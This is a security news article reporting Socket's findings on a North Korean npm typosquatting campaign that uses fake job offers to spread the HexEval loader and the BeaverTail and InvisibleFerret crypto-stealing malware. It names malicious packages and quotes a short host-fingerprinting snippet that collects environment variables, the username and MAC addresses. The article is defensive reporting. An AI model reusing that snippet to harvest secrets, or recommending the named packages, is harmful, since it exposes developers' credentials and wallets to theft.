North Korean APT Launches Massive npm Supply Chain Attack: Typosquatting & Fake Jobs Steal Crypto from Devs • Daily CyberSecurity

In a detailed expose, the Socket Threat Research Team has uncovered an ongoing and highly targeted supply chain attack attributed to North Korean threat actors, believed to be linked to the “Contagious Interview” campaign. The attackers are leveraging typosquatted npm packages and sophisticated social engineering to compromise developers and software engineers actively seeking jobs.

The attackers have published 35 malicious npm packages using 24 npm accounts, with six still live at the time of reporting—including react-plaid-sdk, sumsub-node-websdk, and vite-loader-svg. Together, these have been downloaded over 4,000 times.

Each package contains a malicious hex-encoded JavaScript loader known as HexEval. Socket describes its role:

“HexEval Loader collects host metadata, decodes its follow-on script, and, when triggered, fetches and runs BeaverTail, the infostealing second-stage malware linked to the Democratic People’s Republic of Korea (DPRK) attackers.”

This layered malware structure—HexEval → BeaverTail → InvisibleFerret—evades static code scans and leaves little forensic trace in the npm registry.

The campaign begins with convincing social engineering. North Korean operatives masquerade as recruiters on LinkedIn and lure developers with lucrative job offers (e.g., $16,000–$25,000/month). The attackers deliver code assignments embedded with malicious packages, urging victims to execute them outside containerized environments while screen-sharing.

“Victims are approached with lucrative job offers… instructing blockchain developers to interact with a Bitbucket repository as part of a fake recruitment process.”

Once the code is executed, HexEval transmits environment data to a C2 server and fetches BeaverTail, a second-stage malware that targets browser cookies, IndexedDB data, cryptocurrency wallets, and macOS Keychain files. Socket notes:

“BeaverTail scans local file systems… including Brave, Chrome, and Opera profiles. It attempts to extract files like Solana’s id.json and Exodus wallet data.”

The malware adapts dynamically to Windows, macOS, and Linux hosts. In some cases, a third-stage backdoor—InvisibleFerret—is also deployed.

Several packages contain reconnaissance scripts that fingerprint the host:

// Host fingerprinting
const data = {
  ...process.env,                     // Extract environment variables
  platform:   os.platform(),          // Operating system 
  hostname:   os.hostname(),          // Machine host name
  username:   os.userInfo().username, // Current user account
  macAddresses: getMacAddress()       // MAC address for device fingerprinting
};

In the case of jsonsecs, a cross-platform keylogger was also embedded, hooking into OS-level input functions to capture keystrokes in real-time.

“The jsonsecs package includes compiled native binaries… enabling exfiltration or real-time surveillance by the threat actors.”

The attackers are evolving. Socket notes a shift from directly embedding malware to a modular, fetch-on-demand approach using HexEval. This makes detection harder and delays the execution of payloads until runtime conditions are met.

Socket warns:

“The campaign is still active, and we expect additional malicious packages to surface.”

They recommend developers:

Avoid installing npm packages from unfamiliar or suspicious accounts.
Use sandboxed or containerized environments for running unknown code.
Check for typosquatting and inspect the source code of dependencies.
Use automated supply chain security tools that detect behavior-based anomalies.

Rate this post

Support Our Threat Intelligence

If you find our CVE report and cybersecurity news helpful, consider supporting our work.

Buy Me a Coffee PayPal

Critical Alert 1 Active Exploit Detected Today

Related Posts:

Support Our Threat Intelligence

Related posts:

Leave a Reply Cancel reply